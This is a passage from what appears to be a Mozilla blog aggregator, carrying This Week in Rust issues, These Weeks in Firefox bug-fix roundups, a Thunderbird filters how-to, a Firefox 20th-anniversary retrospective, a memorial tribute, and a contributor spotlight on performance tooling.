Quote of the Week

The whole point of Rust is that before there were two worlds:

  • Inefficient, garbage collected, reliable languages
  • Efficient, manually allocated, dangerous languages

And the mark of being a good developer in the first was mitigating the inefficiency well, and for the second it was it didn't crash, corrupt memory, or be riddled with security issues. Rust makes the trade-off instead that being good means understanding how to avoid the compiler yelling at you.

Simon Buchan on rust-users

Thanks to binarycat for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Firefox NightlyNew Address Bar Updates are Here – These Weeks in Firefox: Issue 172

Highlights

  • Our newly updated address bar, also known as “Scotch Bonnet”, is available in Nightly builds! 🎉
  • Weather suggestions have also been enabled in Nightly. The feature is US only at this time, as part of Firefox Suggest. :rain_cloud:
  • robwu fixed a regression introduced in Firefox 132 that was triggering the default built-in theme to be re-enabled on every browser startup – Bug 1928082
  • Love Firefox Profiler and DevTools? Check out the latest DevTools updates and see how they can better help you track down issues.

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • abhijeetchawla[:ff2400t]
  • Collin Richards
  • John Bieling (:TbSync)
  • kernp25

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • As a part of Bug 1928082, a failure hit by the new test_default_theme.js xpcshell test will ensure the default theme manifest version is in sync in both the manifest and the XPIProvider startup call to maybeInstallBuiltinAddon
WebExtensions Framework
  • Fixed a leak in ext-theme hit when an extension was setting a per-window theme using the theme WebExtensions API – Bug 1579943
  • ExtensionPolicyService content scripts helper methods has been tweaked to fix a low frequency crash hit by ExtensionPolicyService::ExecuteContentScripts – Bug 1916569
  • Fixed an unexpected issue with loading moz-extension url as subframe of the background page for extensions loaded temporarily from a directory – Bug 1926106
  • Prevent window.close() calls originated from the WebExtensions registered devtools panel to close the browser chrome window (when there is only a single tab open) – Bug 1926373
    • Thanks to Becca King for contributing this fix 🎉
  • Native messaging support for snap-packaged Firefox (default on Ubuntu):
    • Thanks to Alexandre Lissy for working on finalizing the patches from Bug 1661935
    • Fixed a regression hit by the snap-packaged Firefox 133 build – Bug 1930119
WebExtension APIs
  • Fixed a bug preventing declarativeNetRequest API dynamic rules to work correctly after a browser restart for extensions not having any static rules registered – Bug 1921353

DevTools

DevTools Toolbox

DevTools debugger log points being marked in a profiler instance

Lint, Docs and Workflow

  • A change to the mozilla/reject-addtask-only has just landed on Autoland.
    • This makes it so that when the rule is raising an issue with .only() in tests, only the .only() is highlighted, not the whole test:

a before screenshot of the Firefox code linter highlighting a whole test

an after screenshot of the Firefox code linter highlighting the ".only" part of a test

Migration Improvements

New Tab Page

  • The team is working on some new section layout and organization variations – specifically, we’re testing whether or not recommended stories should be grouped into various configurable topic sections. Stay tuned!

Picture-in-Picture

  • Thanks to contributor kern25 for:
    • Updating our Dailymotion site-specific wrapper (bug), which also happens to fix broken PiP captions (bug).
    • Updating our videojs site-specific wrapper (bug) to recognize multiple cue elements. This fixes PiP captions rendering incorrectly on Windows for some sites.

Search and Navigation

Firefox NightlyCelebrating 20 years of Firefox – These Weeks in Firefox: Issue 171

Highlights

  • Firefox is turning 20 years old! Here’s a sneak peek of what’s to come for the browser.
  • We completed work on the new messaging surface for the AppMenu / FxA avatar menu. There’s a new FXA_ACCOUNTS_APPMENU_PROTECT_BROWSING_DATA entry in about:asrouter for people who’d like to try it. Here’s another variation:

a message with an illustration of a cute fox sitting on a cloud, as well as a sign-up button, encouraging users to create a Mozilla account

  • The experiment will also test new copy for the state of the sign-in button when this message is dismissed:

  • Alexandre Poirot added an option in the Debugger Sources panel to control the visibility of WebExtension content scripts (#1698068)

  • Hubert Boma Manilla improved the Debugger by adding the paused line location in the “paused” section, and making it a live region so it’s announced to screen reader when pausing/stepping (#1843320)

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • abhijeetchawla[:ff2400t]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • In Firefox >= 133, WebExtensions sidebar panels can close themselves using window.close() (Bug 1921631)
    • Thanks to Becca King for contributing this enhancement to the WebExtensions sidebar panels 🎉
WebExtension APIs
  • A new telemetry probe related to the storage.sync quota has been introduced in Firefox 133 (Bug 1915183). The new probe is meant to help plan replacement of the deprecated Kinto-based backend with a rust-based storage.sync implementation in Firefox for Android (similar to the one introduced in Firefox for desktop v79).

DevTools

DevTools Toolbox

Lint, Docs and Workflow

  • The source documentation generate and upload tasks on CI will now output specific TEST-UNEXPECTED-FAILURE lines for new warnings/errors.
    • Running ./mach doc locally should generally do the same.
    • The previous “max n warnings” has been replaced by an allow list of current warnings/errors.
  • Flat config and ESLint v9 support has now been added to eslint-plugin-mozilla.
    • This is a big step in preparing to switch mozilla-central over to the new flat configuration & then v9.
  • hjones upgraded stylelint to the latest version and swapped its plugins to use ES modules.

New Tab Page

  • The New Tab team is analyzing the results from an experiment that tried different layouts, to see how it impacted usage. Our Data Scientists are pouring over the data to help inform design directions moving forward.
  • Another experiment is primed to run once Firefox 132 fully ships to release – the new “big rectangle” vertical widget will be tested to see whether or not users find this new affordance useful.
  • Work completed on the Fakespot experiment that we’re going to be running for Firefox 133 in December. We’ll be using the vertical widget to display products identified as high-quality, with reliable reviews.

Search and Navigation

  • 2024 Address Bar Scotch Bonnet Project
    • Various bugs were fixed by Mandy, Dale, and Yazan
      • quick actions search mode preview was formatted incorrectly (1923550)
      • dedicated Search button was getting stuck after clicking twice (1913193)
      • about chiclets not showing up when scotch bonnet is enabled (1925643)
      • tab to search not shown when scotch bonnet is enabled (1925129)
      • searchmode switcher works when Search Services fails (1906541)
      • localize strings for search mode switcher button (1924228)
      • secondary actions UX updated to be shown between heuristic and first search suggestion. (1922570)
    • To try out these scotch bonnet features, use the PREF browser.urlbar.scotchBonnet.enableOverride
  • Address Bar
    • Moritz deduplicated bookmark and history results with the same URL, but different references. (1924968) browser.urlbar.deduplication.enabled
    • Daisuke fixed overlapping remote tab text in compact mode (1924911)
    • Richardscollin, a volunteer contributor, fixed pressing esc on the address bar when it was selected and will now return focus to the window. (1086524)
    • Daisuke fixed the “Not Secure” label being Illegible when the width is too small (1925332)
  • Suggest
    • adw has been working on City-based weather suggestions (1921126, 1925734, 1925735, 1927010)
    • adw working on integrating machine learning (MLSuggest) with UrlbarPRoviderQuickSuggest (1926381)
  • Search
    • Mortiz landed a patch to localize the keyword for wikipedia search engine. 1687153, 1925735
  • Places
    • Yazan landed favicon improvement on how firefox picks the best favicon for page-icon urls without a path. (1664001)
    • Mak landed a patch where we significantly improved performance and memory usage when checking for visited URIs. The process by executing a single query for the entire batch of URIs, instead of running one query per URI. (1594368)

Firefox NightlyExperimental address bar deduplication, better auto-open Picture-in-Picture, and more – These Weeks in Firefox: Issue 170

Highlights

  • A new messaging surface for the AppMenu and PXI menu is landing imminently so that we can experiment with some messages to help users understand the value of signing up for / signing into a Mozilla account

a message with a cute fox illustration and a sign-up button in Firefox's app menu encouraging users to create a Mozilla account

  • mconley landed a patch to make the heuristics for the automatic Picture-in-Picture feature a bit smarter. This should make it less likely to auto-pip silent or small videos.
  • Moritz fixed an older bug for the address bar where duplicate Google Docs results had been appearing in the address bar dropdown. This fix is currently behind a disabled pref – people are free to test the behavior flipping browser.urlbar.deduplication.enabled to true, and feedback is welcome. We’re still investigating UI treatments to eventually show the duplicates. (1389229)

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • Gregory Pappas [:gregp]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
WebExtensions Framework
  • Thanks to Florian for moving WebExtensions and AddonsManager telemetry probes away from the legacy telemetry API (Bug 1920073, Bug 1923015)
WebExtension APIs
  • The cookies API will be sorting cookies according to RFC 6265 (Bug 1818968), fixing a small chrome incompatibility issue

Migration Improvements

New Tab Page

  • We will be running an experiment in December featuring a Fakespot feed in the vertical list on newtab. This list will show products that have been identified as high-quality, and with reliable product reviews. They will link to more detailed Fakespot product pages that will give a breakdown of the product analysis. The test is not being monetized.
    • Note: A previous version of this post featured a mockup image that predated the feature being built.

a list of products identified by Fakespot as having reliable reviews for a Holiday Gift Guide, displayed in New Tab.

Picture-in-Picture

  • Special shout-out to volunteer contributor def00111 who has been helping out with our site-specific wrappers!

Search and Navigation

  • 2024 Address Bar Updates (previously known as “Project Scotch Bonnet”)
    • Intuitive Search Keywords
      • Mandy added new telemetry related to intuitive search keywords (1919180)
      • Mandy also landed a patch to list the keywords in the results panel when a user types `@` (1921549)
    • Unified Search Button
      • Daisuke refined our telemetry so that user interactions with the unified search button are differentiated from user interactions with the original one-off search button row (1919857)
    • Persisted Search
      • James fixed a bug related to persisting search terms for non-default search engines (1921092)
    • Search Config v2
      • Moritz landed a patch that streamlines how we handle search parameter names for search engine URLs (1895934)
    • Search & Suggest
      • Nan landed a patch that allows us to integrate a user-interest-based relevance ranking into the address bar suggestions we receive from our Merino server (1923187)
    • Places Database
      • Daisuke landed a series of patches so that the Places database no longer fetches any icons over the network. Now that icon fetching is delegated to consumers which have better knowledge about how to do it in a safer way. (1894633)
    • Favicons
      • Yazan landed several patches related to favicons which improve the way we pick a best favicon, avoiding excessive downscaling of large favicons that could make the favicon unrecognizable. (1494016, 1556396, 1923175)

Mozilla ThunderbirdMaximize Your Day: Make Important Messages Stand Out with Filters

For the past two decades, I’ve been trying to get on Jeopardy. This is harder than answering a Final Jeopardy question in your toughest subject. Roughly a tenth of people who take the exam get invited to auditions, and only a tenth of those who make it to auditions make it to the Contestant Pool and into the show. During this time, there are two emails you DON’T want to miss: the first saying you made it to auditions, and the second that you’re in the Contestant Pool. (This second email comes with your contestant form, and yes, I have my short, fun anecdotes to share with host Ken Jennings ready to go.)

The next time I audition, reader, I am eliminating refreshing my inbox every five minutes. Instead, I’ll use Thunderbird Filters to make any emails from the Jeopardy Contestant department STAND OUT.

Whether you’re hoping to be called up for a game show, waiting on important life news, or otherwise needing to be alert, Thunderbird is here to help you out.

Make Important Messages Stand Out with Filters

Most of our previous posts have focused on cleaning out your inbox. Now, in addition to showing you how Thunderbird can clear visual and mental clutter out of the way, we’re using filters to make important messages stand out.

  1. Click the Application menu button, then Tools. followed by Message Filters.
  2. Click New. A Filter Rules dialog box will appear.
  1. In the “Filter Name” field, type a name for your filter.
  2. Under “Apply filter when”, check one of the options or both. (You probably won’t want to change from the default “Getting New Mail” and “Manually Run” options.)
  3. In the “Getting New Mail: ” dropdown menu, choose either Filter before Junk Classification or Filter after Junk Classification. (As for me, I’m choosing Filter before Junk Classification. Just in case)
  4. Choose a property, a test and a value for each rule you want to apply:
  • A property is a message element or characteristic such as “Subject” or “From”
  • A test is a check on the property, such as “contains” or “is in my address book”
  • A value completes the test with a specific detail, such as an email address or keyword
  1. Choose one or more actions for messages that meet those criteria. (For extra caution, I put THREE actions on my sample filter. You might only need one!)
<figcaption class="wp-element-caption">(Note – not the actual Jeopardy addresses!)</figcaption>

Find (and Filter) Your Important Messages

Thunderbird also lets you create a filter directly from a message. Say you’re organizing your inbox and you see a message you don’t want to miss in the future. Highlight the email, and click on the Message menu button. Scroll down to and click on ‘Create Filter from Message.’ This will open a New Filter window, automatically filled with the sender’s address. Add any other properties, tests, or values, as above. Choose your actions, name your filter, and ta-da! Your new filter will help you know when that next important email arrives.

Resources

As with last month’s article, this post was inspired by a Mastodon post (sadly, this one was deleted, but thank you, original poster!). Many thanks to our amazing Knowledge Base writers at Mozilla Support who wrote our guide to filters. Also, thanks to Martin Brinkmann and his ghacks website for this and many other helpful Thunderbird guides!

Getting Started with Filters Mozilla Support article: https://support.mozilla.org/en-US/kb/organize-your-messages-using-filters

How to Make Important Messages Stick Out in Thunderbird: https://www.ghacks.net/2022/12/02/how-to-make-important-emails-stick-out-in-thunderbird/

The post Maximize Your Day: Make Important Messages Stand Out with Filters appeared first on The Thunderbird Blog.

The Mozilla Blog20 years of Firefox: How a community project changed the web

What was browsing the web like in 2004? People said things like “surfing the internet,” for starters. Excessive pop-up ads were annoying but they felt like the norm. The search bar and multiple tabs did not exist, and there seemed to be only one browser in sight. That is, until Firefox 1.0 arrived and gave it real competition.

Built by a group of passionate developers who believed the web should be open, safe and not controlled by a single tech giant, Firefox became the choice for anyone who wanted to experience the internet differently. Millions made the switch, and the web felt bigger. 

As the internet started to evolve, so did Firefox — becoming a symbol of open innovation, digital privacy and, above all, the ability to experience the web on your own terms. Here are some key moments of the last 20 years of Firefox.

2004: Firefox 1.0 launch

Firefox 1.0 launched on Nov. 9, 2004. As an open-source project, Firefox was developed by a global community of volunteers who collaborated to make a browser that’s more secure, user-friendly and customizable. With built-in pop-up blocking, users could finally decide when and if they wanted to see pop-ups. Firefox introduced tabbed browsing, which let people open multiple sites in one window. It also made online safety a priority, with fraud protection to guard against phishing and spoofing. 

<figcaption class="wp-element-caption">On Dec. 15, 2004, Firefox’s community-funded, two-page ad appeared in The New York Times, featuring the names of thousands of supporters and declaring to millions that a faster, safer, and more open browser was here to stay.</figcaption>

2005: Mozilla Developer Center

Mozilla launched the Mozilla Developer Center (now MDN Web Docs) as a hub for web standards and developer resources. Today, MDN remains a trusted resource maintained by Mozilla and a global community of contributors.

A crop circle of the Firefox logo.<figcaption class="wp-element-caption">Local Firefox fans in Oregon made a Firefox crop circle in an oat field in August 2006. </figcaption>

2007: Open-source community support

The SUMO (support.mozilla.org) platform was originally built in 2007 to provide an open-source community support channel for users, and to help us collaborate more effectively with our volunteer contributors. Over the years, SUMO has become a powerful platform that helps users get the most out of Firefox, provides opportunities for users to connect and learn more from each other, and allows us to gather important insights – all powered by our community of contributors. Six active contributors have been with us since day one (shout outs to cor-el, jscher2000, James, mozbrowser, AliceWyman and marsf) and 16 contributors have been here for 15+ years!

<figcaption class="wp-element-caption">A Mozilla contributor story by Chris Hoffman.</figcaption>

2008: A Guinness World Record

Firefox 3.0 made history by setting a Guinness World Record for the most software downloads – over 8 million – in a single day. The event known as Download Day was celebrated across Mozilla communities worldwide, marking a moment of pride for developers, contributors and fans. 

2010: Firefox goes mobile

Firefox made its debut on mobile on Nokia N900. It brought beloved features like tabbed browsing, the Awesome Bar, and Weave Sync, allowing users to sync between desktop and mobile. It also became the first mobile browser to support add-ons, giving users the freedom to customize their browsing on the go.

A blue denim pocket with an orange fox tail sticking out from the top.<figcaption class="wp-element-caption">Pocketfox by Yaroslaff Chekunov, the winner of the “Firefox Goes Mobile” design challenge. </figcaption>

2013: Hello Chrome, it’s Firefox calling

Firefox made a major leap with WebRTC (Web Real-Time Communication), allowing users to make video and voice calls directly between Firefox and Chrome without needing plugins. This cross-browser communication was a breakthrough for open web standards, making it easier for users to connect seamlessly. Firefox also introduced RTCPeerConnection, enabling users to share files during video calls, further enhancing online collaboration.

2014: Privacy on the web

Firefox has shipped a steady drumbeat of anti-tracking features over the years, greatly increasing the privacy of the web. The impact has gone beyond just Firefox users, as online privacy is now a table-stakes deliverable for all browsers.

  • 2014: Block trackers from loading
  • 2016: Containers can isolate sites within Firefox
  • 2018: Enhanced tracking protection blocks tracking cookies (more on this below)
  • 2020: Significant improvements to prevent sites from “fingerprinting” users
  • 2022: Total Cookie Protection isolates all third party tracking cookies (more on this below)

2017: Twice as fast, 30% less memory

The firefox logo on an abstract background in different shades of blue. Text: The new Firefox. Fast for Good

Firefox took a huge step forward with Firefox Quantum, an update that made browsing twice as fast. Thanks to a new engine built using Mozilla’s Rust programming language, Firefox Quantum made pages load faster and used 30% less memory than Chrome. It was all about speed and efficiency, letting users browse quicker without slowing down their computer.

2018: Firefox blocks trackers 

Enhanced Tracking Protection (ETP) was introduced as a new feature that blocks third-party cookies, the primary tool used by companies to track users across websites. ETP made it simple for users to protect their privacy by automatically blocking trackers while ensuring websites still functioned smoothly. Initially an optional feature, ETP became the default setting by early 2019, marking a significant step in giving users better privacy without sacrificing browsing experience.

2019: Advocacy for media formats not encumbered by patents


Mozilla played a significant role in the standardization and adoption of AV1 and AVIF as part of its commitment to open, royalty-free and high-quality media standards for the web. Shipping early support in Firefox for AV1 and AVIF, along with Mozilla’s advocacy, accelerated adoption by platforms like YouTube, Netflix and Twitch. The result is a next-generation, royalty-free video codec that provides high-quality video compression without licensing fees, making it an open and accessible choice for the entire web.

2020: Adobe Flash is discontinued

Adobe retired Flash on Dec. 31, 2020. Mozilla and Firefox played a pivotal role in the end of Adobe Flash by leading the transition toward more secure, performant and open web standards like HTML5, WebGL and WebAssembly. As Firefox and other browsers adopted HTML5, it helped establish these as viable alternatives to Flash. This shift supported more secure and efficient ways to deliver multimedia content, minimizing the web’s reliance on proprietary plugins like Flash.

2022: Total Cookie Protection 

Firefox took privacy further with Total Cookie Protection (TCP), building on the foundation of ETP. Cookies, while helpful for site-specific tasks like keeping you logged in, can also be used by advertisers to track you across multiple sites. TCP isolates cookies by keeping them locked to the site they came from, preventing cross-site tracking. Inspired by the Tor Browser’s privacy features, Firefox’s approach integrates this tool directly into ETP, giving users more control over their data and stopping trackers in their tracks.

2024: 20 years of Firefox

These milestones are just a snapshot of Firefox’s story, full of many chapters that have shaped the web as we know it. Today, Firefox remains at the forefront of championing privacy, open innovation and choice. And while the last 20 years have been transformative, the best is yet to come.

<figcaption class="wp-element-caption">From left to right: Stuart Parmenter, Tracy Walker, Scott McGregor, Ben Goodger, Myk Melez, Chris Hofmann, Asa Dotzler, Johnny Stenbeck, Rafael Ebron, Jay Patel, Vlad Vucecevic and Bryan Ryner. Sitting, from left to right: Chase Philips, David Baron, Mitchell Baker, Brendan Eich, Dan Mosedale, Chris Beard and Doug Turner in 2004. Credit: Mozilla</figcaption>
<figcaption class="wp-element-caption">Mozillians and Foxy in Dublin, Ireland in August 2024. Credit: Mozilla</figcaption>

Get Firefox

Get the browser that protects what’s important

The post 20 years of Firefox: How a community project changed the web appeared first on The Mozilla Blog.

About:CommunityA tribute to Dian Ina Mahendra

It is with a heavy heart that I share the passing of my dear friend, Dian Ina Mahendra, who left us after a long battle with illness. Dian Ina was a remarkable woman whose warmth, kindness, and ever-present support touched everyone around her. Her ability to offer solutions to even the most challenging problems was truly a gift, and she had an uncanny knack for finding a way out of every situation.

Dian Ina’s contribution to Mozilla spanned back to the launch of Firefox 4 in 2011. She had also been heavily involved during the days of Firefox OS, the Webmaker campaign, FoxYeah, and most recently, Firefox Rocket (later renamed Firefox Lite) when it first launched in Indonesia. Additionally, she had been a dedicated contributor to localization through Pontoon.

Those who knew Dian Ina were constantly drawn to her, not just for her brilliant ideas, but for her open heart and listening ear. She was the person people turned to when they needed advice or simply someone to talk to. No matter how big or small the problem, she always knew just what to say, offering guidance with grace and clarity.

Beyond her wisdom, Dian Ina was a source of light and laughter. Her fun-loving nature and infectious energy made her the key person everyone turned to when they were looking for recommendations, whether it was for the best restaurant in town, a great book, or even advice on life itself. Her opinions were trusted, not only for their insight but also for the care she took in considering what would truly benefit others.

Her impact on those around her was immeasurable. She leaves behind a legacy of warmth, wisdom, and a deep sense of trust from everyone who had the privilege of knowing her. We will miss her dearly, but her spirit and the lessons she shared will live on in the hearts of all who knew her.

Here are some of the memories that people shared about Dian Ina:

  • Franc: Ina was a funny person, always with a smile. We shared many events like All Hands, Leadership Summit and more. Que la tierra te sea leve.

  • Rosana Ardila: Dian Ina was a wonderful human being. I remember her warm smile, when she was supporting the community, talking about art or food. She was independent and principled and so incredibly fun to be around. I was looking forward to seeing her again, touring her museum in Jakarta, discovering more food together, talking about art and digital life, the little things you do with people you like. She was so multifaceted, so smart and passionate. She left a mark on me and I will remember her, I’ll keep the memory of her big smile with me.
  • Delphine: I am deeply saddened to hear of Dian Ina’s passing. She was a truly kind and gentle soul, always willing to lend a hand. I will cherish the memories of our conversations and her dedication to her work as a localizer and valued member of the Mozilla community. Her presence will be profoundly missed.
  • Fauzan: For me, Ina is the best mentor in conflict resolution, design, art, dan L10n. She is totally irreplaceable in Indonesian community. We already missed her a lot.
  • William: I will never forget that smile and that contagious laughter of yours. I have such fond memories of my many trips to Jakarta, in large part thanks to you. May you rest in peace dearest Dian Ina.

  • Amira Dhalla: I’m going to remember Ina as the thoughtful, kind, and warm person she always was to everyone around her. We have many memories together but I specifically remember us giggling and jumping around together on the grounds of a castle in Scotland. We had so many fun memories together talking technology, art, and Indonesia. I’m saddened by the news of her passing but comforted by the Mozilla community honoring her in a special way and know we will keep her legacy alive.

  • Kiki: Mbak Ina was one of the female leaders I looked up to within the Mozilla Indonesia Community. She embodied all the definition of a smart and capable woman. The kind who was brave, assertive and above all, so fun to be around. I like that she can keep things real by not being afraid of sharing the hard truth, which is truly appreciative within a community setting. I always thought about her and her partner (Mas Mahen) as a fun and intelligent couple. Deep condolences to Mas Mahen and her entire family in Malang and Bandung. She left a huge mark on the Mozilla Indonesia Community, and she’ll be deeply missed.

  • Joe Cheng: I am deeply saddened to hear of Dian Ina’s passing. As the Product Manager for Firefox Lite, I had the privilege of witnessing her invaluable contributions firsthand. Dian was not only a crucial part of Mozilla’s community in Indonesia but also a driving force behind the success of Firefox Lite and other Mozilla projects. Her enthusiasm, unwavering support, and kindness left an indelible mark on everyone who met her. I fondly remember the time my team and I spent with her during our visit to Jakarta, where her vibrant spirit and warm smiles brought joy to our interactions. Dian’s positive energy and dedication will be remembered always, and her legacy will live on in the Mozilla community and beyond. She will be dearly missed.

This Week In RustThis Week in Rust 573

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is struct-split, a proc macro to implement partial borrows.

Thanks to Felix for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

403 pull requests were merged in the last week

Rust Compiler Performance Triage

Regressions primarily in doc builds. No significant changes in cycle or max-rss counts.

Triage done by @simulacrum. Revision range: 27e38f8f..d4822c2d

1 Regressions, 1 Improvements, 4 Mixed; 1 of them in rollups 47 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-11-13 - 2024-12-11 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Netstack3 encompasses 63 crates and 60 developer-years of code. It contains more code than the top ten crates on crates.io combined. ... For the past eleven months, they have been running the new networking stack on 60 devices, full time. In that time, Liebow-Feeser said, most code would have been expected to show "mountains of bugs". Netstack3 had only three; he attributed that low number to the team's approach of encoding as many important invariants in the type system as possible.

Joshua Liebow-Feeser at RustConf, as reported by Daroc Alden on Linux Weekly News

Thanks to Anton Fetisov for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

About:CommunityContributor spotlight – MyeongJun Go

The beauty of an open source software lies in the collaborative spirit of its contributors. In this post, we’re highlighting the story of MyeongJun Go (Jun), who has been a dedicated contributor to the Performance Tools team. His contributions have made a remarkable impact on performance testing and tooling, from local tools like Mach Try Perf and Raptor to web-based tools such as Treeherder. Thanks to Jun, developers are even more empowered to improve the performance of our products.

Open source has offered me invaluable lessons that are hard to gain elsewhere. Working with people from around the world, I’ve learned effective collaboration practices that help us minimize disruptions and improve development quality. From code reviews, writing test cases, to clean code and refactoring practices, I’ve gained essential skills for producing maintainable, high quality code.

Q: Can you tell us a little about how you first got involved with Mozilla?

I felt a constant thirst for development while working on company services. I wanted to create something that could benefit the world and collaborate with developers globally. That’s when I decided to dive into open source development.

Around that time, I was already using Firefox as my primary browser, and I frequently referenced MDN for work, naturally familiarizing myself with Mozilla’s services. One day, I thought, how amazing would it be to contribute to a Mozilla open source project used by people worldwide? So, I joined an open source challenge.

At first, I wondered, can I really contribute to Firefox? But thanks to the supportive Mozilla staff, I was able to tackle one issue at a time and gradually build my experience.

Q: Your contributions have had a major impact on performance testing and tooling. What has been your favourite or most rewarding project to work on so far?

I’ve genuinely found every project and task rewarding—and enjoyable too. Each time I completed a task, I felt a strong sense of accomplishment.

If I had to pick one particularly memorable project, it would be the Perfdocs tool. It was my first significant project when I started contributing more actively, and its purpose is to automate documentation for the various performance tools scattered across the ecosystem. With every code push, Perfdocs automatically generates documentation in “Firefox Source Docs”.

Working on this tool gave me the chance to familiarize myself with various performance tools one by one, while also building confidence in contributing. It was rewarding to enhance the features and see the resulting documentation instantly, making the impact very tangible. Hearing from other developers about how much it simplified their work was incredibly motivating and made the experience even more fulfilling.

Q: Performance tools are critical for developers. Can you walk us through how your work helps improve the overall performance of Mozilla products?

I’ve applied various patches across multiple areas, but updates to tools like Mach Try Perf and Perfherder, which many users rely on, have had a particularly strong impact.

With Mach Try Perf, developers can easily perform performance tests by platform and category, comparing results between the base commit (before changes) and the head commit (after changes). However, since each test can take considerable time, I developed a caching feature that stores test results from previous runs when the base commit is the same. This allows us to reuse existing results instead of re-running tests, significantly reducing the time needed for performance testing.

I also developed several convenient flags to enhance testing efficiency. For instance, when an alert occurs in Perfherder, developers can now re-run tests simply by using the “–alert” flag with the alert ID in the Mach Try Perf command.

Additionally, I recently integrated Perfherder with Bugzilla to automatically file bugs. Now, with just a click of the ‘file bug’ button, related bugs are filed automatically, reducing the need for manual follow-up.

These patches, I believe, have collectively helped improve the productivity of Mozilla’s developers and contributors, saving a lot of time in the development process.

Q: How much of a challenge do you find being in a different time zone to the rest of the team? How do you manage this?

I currently live in South Korea (GMT+9), and most team meetings are scheduled from 10 PM to midnight my time. During the day, I focus on my job, and in the evening, I contribute to the project. This setup actually helps me use my time more efficiently. In fact, I sometimes feel that if we were in the same time zone, balancing both my work and attending team meetings might be even more challenging.

Q: What are some tools or methodologies you rely on?

When developing Firefox, I mainly rely on two tools: Visual Studio Code (VSC) on Linux and SearchFox. SearchFox is incredibly useful for navigating Mozilla’s vast codebase, especially as it’s web-based and makes sharing code with teammates easy.

Since Mozilla’s code is open source, it’s accessible for the world to see and contribute to. This openness encourages me to seek feedback from mentors regularly and to focus on refactoring through detailed code reviews, with the goal of continually improving code quality.

I’ve learned so much in this process, especially about reducing code complexity and enhancing quality. I’m always grateful for the detailed reviews and constructive feedback that help me improve.

Q: Are there any exciting projects you’d like to work on?

I’m currently finding plenty of challenge and growth working with testing components, so rather than seeking new projects, I’m focused on my current tasks. I’m also interested in learning Rust and exploring trends like AI and blockchain.

Recently, I’ve considered ways to improve user convenience in tools like Mach Try Perf and Perfherder, such as making test results clearer and easier to review. I’m happy with my work and growth here, but I keep an open mind toward new opportunities. After all, one thing I’ve learned in open source is to never say, ‘I can’t do this.’

Q: What advice would you give to someone new to contributing?

If you’re starting as a contributor to the codebase, building it alone might feel challenging. You might wonder, “Can I really do this?” But remember, you absolutely can. There’s one thing you’ll need: persistence. Hold on to a single issue and keep challenging yourself. As you solve each issue, you’ll find your skills growing over time. It’s a meaningful challenge, knowing that your contributions can make a difference. Contributing will make you more resilient and help you grow into a better developer.

Q: What’s something you’ve learned during your time working on performance tools?

Working with performance tools has given me valuable experience across a variety of tools, from local ones like Mach Try Perf, Raptor, and Perfdocs to web based tools such as Treeherder and Perfherder. Not only have I deepened my technical skills, but I also became comfortable using Python, which wasn’t my primary language before.

Since Firefox runs across diverse environments, I learned how to execute individual tests for different conditions and manage and visualize performance test results efficiently. This experience taught me the full extent of automation’s capabilities and inspired me to explore how far we can push it.

Through this large scale project, I’ve learned how to approach development from scratch, analyze requirements, and carry out development while considering the impact of changes. My skills in impact analysis and debugging have grown significantly.

